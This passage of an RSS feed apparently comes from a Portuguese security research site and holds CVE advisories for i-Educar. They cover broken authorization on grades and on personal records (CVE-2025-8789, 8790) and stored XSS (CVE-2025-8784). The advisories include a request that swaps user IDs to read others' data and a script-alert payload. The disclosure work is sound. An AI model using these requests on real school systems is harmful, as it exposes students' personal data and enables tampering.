&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;9
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;{&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;oper&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;post&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;resource&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;grades&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;msgs&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;[{&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;msg&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;Notas publicadas com sucesso!&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;,&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;type&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;success&amp;amp;#34;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;}],&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;s2&amp;#34;&amp;gt;&amp;amp;#34;any_error_msg&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;:&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;kc&amp;#34;&amp;gt;false&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;}&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta é uma vulnerabilidade de Autorização de Nível de Função Quebrada (BFLA), conforme categorizado pelo OWASP API Security Top 10 (2023) - API4. As consequências incluem:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Adulteração de dados acadêmicos sem autorização.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Perda da integridade dos dados em registros escolares.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possíveis danos legais e à reputação de instituições educacionais.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8789.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8790</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8790/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8790/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8790-broken-object-level-authorization-bola-permite-acesso-não-autorizado-a-dados-de-outros-usuários&amp;#34;&amp;gt;CVE-2025-8790: Broken Object Level Authorization (BOLA) permite acesso não autorizado a dados de outros usuários
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada na API do i-educar 2.8 e 2.9, permitindo que qualquer usuário autenticado com privilégios baixos acesse informações confidenciais de outros usuários manipulando o parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; no endpoint de recurso &amp;lt;code&amp;gt;pessoa&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O endpoint &amp;lt;code&amp;gt;/module/Api/pessoa&amp;lt;/code&amp;gt; não possui verificações de autorização adequadas para garantir que o usuário autenticado só consiga acessar seus próprios dados.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Ao alterar o parâmetro id na solicitação a seguir, qualquer usuário autenticado pode recuperar informações sobre outros usuários:&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/pessoa?&amp;amp;oper=get&amp;amp;resource=pessoa&amp;amp;id=1 HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8790-broken-object-level-authorization-bola-permite-acesso-não-autorizado-a-dados-de-outros-usuários&amp;#34;&amp;gt;CVE-2025-8790: Broken Object Level Authorization (BOLA) permite acesso não autorizado a dados de outros usuários
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8790&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada na API do i-educar 2.8 e 2.9, permitindo que qualquer usuário autenticado com privilégios baixos acesse informações confidenciais de outros usuários manipulando o parâmetro &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; no endpoint de recurso &amp;lt;code&amp;gt;pessoa&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O endpoint &amp;lt;code&amp;gt;/module/Api/pessoa&amp;lt;/code&amp;gt; não possui verificações de autorização adequadas para garantir que o usuário autenticado só consiga acessar seus próprios dados.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Ao alterar o parâmetro id na solicitação a seguir, qualquer usuário autenticado pode recuperar informações sobre outros usuários:&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/pessoa?&amp;amp;oper=get&amp;amp;resource=pessoa&amp;amp;id=1 HTTP/1.1&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;1. Autentique-se como um usuário sem privilégios (por exemplo, aluno, professor).&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8790/image.png&amp;#34;
	width=&amp;#34;1844&amp;#34;
	height=&amp;#34;712&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8790/image_hu_48fc6d25edbda623.png 480w, /p/cve-2025-8790/image_hu_74ee304be9e6fa02.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;258&amp;#34;
		data-flex-basis=&amp;#34;621px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;2. Envie a seguinte solicitação direcionada ao usuário id=1:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /module/Api/pessoa?&amp;amp;amp;oper=get&amp;amp;amp;resource=pessoa&amp;amp;amp;id=1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=VALID_SESSION_COOKIE }
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8790/image-1.png&amp;#34;
	width=&amp;#34;1692&amp;#34;
	height=&amp;#34;722&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8790/image-1_hu_c84dc371c6bf6535.png 480w, /p/cve-2025-8790/image-1_hu_320efcd74fb43e61.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;234&amp;#34;
		data-flex-basis=&amp;#34;562px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;3. Observe que os dados do usuário para id=1 são retornados, mesmo que o usuário logado não esteja autorizado a acessar esse perfil:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8790/image-2.png&amp;#34;
	width=&amp;#34;340&amp;#34;
	height=&amp;#34;205&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8790/image-2_hu_d9c8057967bbba47.png 480w, /p/cve-2025-8790/image-2_hu_ab2516e3d6f6df9a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;165&amp;#34;
		data-flex-basis=&amp;#34;398px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Esta vulnerabilidade é um problema de Broken Object Level Authorization (BOLA) (OWASP API Top 10 - 2023, A01), permitindo a exposição de dados confidenciais. Qualquer usuário autenticado pode acessar informações pessoais de outros usuários. Isso pode levar a:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Acesso não autorizado a PII confidenciais;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violação das leis de proteção de dados (por exemplo, LGPD, GDPR);&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possível abuso de dados do usuário ou personificação;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Enumeração de usuários.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8790.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Sun, 10 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8784</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8784/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8784/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8784-cross-site-scripting-xss-armazenado-no-endpoint-funcionario_vinculo_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8784: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8784-cross-site-scripting-xss-armazenado-no-endpoint-funcionario_vinculo_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8784: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8784&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;funcionario_vinculo_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS2&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8784/image-1.png&amp;#34;
	width=&amp;#34;816&amp;#34;
	height=&amp;#34;785&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8784/image-1_hu_65d849fc4a441b59.png 480w, /p/cve-2025-8784/image-1_hu_8e8bc4b51d611da8.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;103&amp;#34;
		data-flex-basis=&amp;#34;249px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
